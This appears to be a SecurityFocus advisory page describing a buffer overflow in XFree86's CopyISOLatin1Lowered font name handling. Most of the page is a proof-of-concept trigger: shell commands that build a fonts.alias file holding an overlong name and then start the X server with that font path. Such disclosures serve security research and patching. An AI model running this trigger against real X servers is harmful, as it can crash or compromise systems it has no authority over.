XFree86 CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability

The following proof of concept has been supplied:

# cat > fonts.dir <<EOF
1
word.bdf -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
EOF
# perl -e 'print "data " . "0" x 2048 . "A" x 96 . "\n"' > fonts.alias
# X :0 -fp $PWD


 

Privacy Statement
Copyright 2010, SecurityFocus